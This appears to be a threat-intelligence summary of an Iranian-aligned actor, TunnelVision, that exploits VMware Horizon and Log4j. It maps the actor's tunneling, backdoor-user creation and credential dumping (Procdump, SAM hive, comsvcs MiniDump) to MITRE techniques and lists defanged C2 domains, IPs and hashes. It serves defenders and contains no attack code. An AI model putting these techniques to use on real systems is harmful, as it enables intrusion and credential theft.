SentinelLabs tracks TunnelVision, an Iranian-aligned threat actor cluster exploiting VMware Horizon and Log4j vulnerabilities to deploy backdoors, harvest credentials, and move laterally in the Middle East and the US. The operation heavily relies on tunneling tools (FRPC, Plink) and shows ties to broader Phosphorus activity, including ransomware deployment. #TunnelVision #Phosphorus #CharmingKitten #NemesisKitten #Log4Shell #VMwareHorizon #FRPC #Plink
Keypoints
- TunnelVision is an Iranian-aligned threat actor cluster observed in the Middle East and the US.
- The group heavily uses tunneling tools (FRPC, Plink) to wrap and hide traffic as part of their operations.
- Exploits 1-day vulnerabilities (FortiOS CVE-2018-13379, ProxyShell, Log4Shell) and focuses on VMware Horizon exploitation.
- VMware Horizon vulnerability exploitation spawns malicious processes from Tomcat to run PowerShell, deploy backdoors, harvest credentials, and enable lateral movement.
- PowerShell-based actions include webhooks for outputs and attempts to download ngrok, with several legitimate services used in operations (e.g., transfer.sh, webhook.site).
- Two described reverse shells and multiple backdoors (including a service named InteropServices) illustrate ongoing, multi-stage payloads and C2 communication.
- Attribution discussions connect TunnelVision to Phosphorus and related actors (Charming Kitten, Nemesis Kitten), though data remains inconclusive about complete identity.
MITRE Techniques
- [T1059.001] PowerShell – The actors run PowerShell commands via the Tomcat process to execute payloads and later use PS reverse shells. ‘…run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.’
- [T1105] Ingress Tool Transfer – The actor downloads tool payloads (e.g., ngrok) to compromised Horizon servers during the PowerShell activity. ‘attempted to download ngrok to a compromised VMware Horizon server’
- [T1572] Protocol Tunneling – The group uses tunneling tools (FRPC, Plink) to tunnel traffic, notably RDP traffic. ‘Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.’
- [T1136] Create Account – Backdoor creation involves creating a new user and privileging it as an administrator. ‘Creation of a backdoor user and adding it to the administrators group.’
- [T1003] Credential Dumping – Credential harvesting with Procdump, SAM hive dumps, and MiniDump. ‘Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.’
- [T1046] Network Service Scanning – Recon activity includes an internal subnet RDP scan using a public port scanner. ‘Internal subnet RDP scan using a publicly available port scan script.’
- [T1071.001] Web Protocols – C2 beacons and exfiltration via web services/webhooks. ‘beaconing to the same C2 server’ and ‘sending outputs back utilizing a webhook.’
Indicators of Compromise
- [Domain] C2/payload domains – www[.]microsoft-updateserver[.]cf, www[.]service-management[.]tk
- [IP] C2 Servers – 51.89.169[.]198, 142.44.251[.]77
- [IP] Additional C2/Payload/Tunneling Servers – 51.89.135[.]142, 51.89.190[.]128
- [IP] Tunneling/Payload Server – 51.89.178[.]210 (Payload/Tunneling)
- [IP] Tunneling Server – 142.44.135[.]86
- [IP] Additional Payload Server – 182.54.217[.]2
- [Github Account] https://github.com/protections20 – account used to host payloads
- [Hash] d28e07d2722f771bd31c9ff90b9c64d4a188435a – ZIP file containing a custom backdoor
- [Hash] 624278ed3019a42131a3a3f6e0e2aac8d8c8b438 – backdoor binary
- [File] InteropServices.exe – dropped executable registered as a service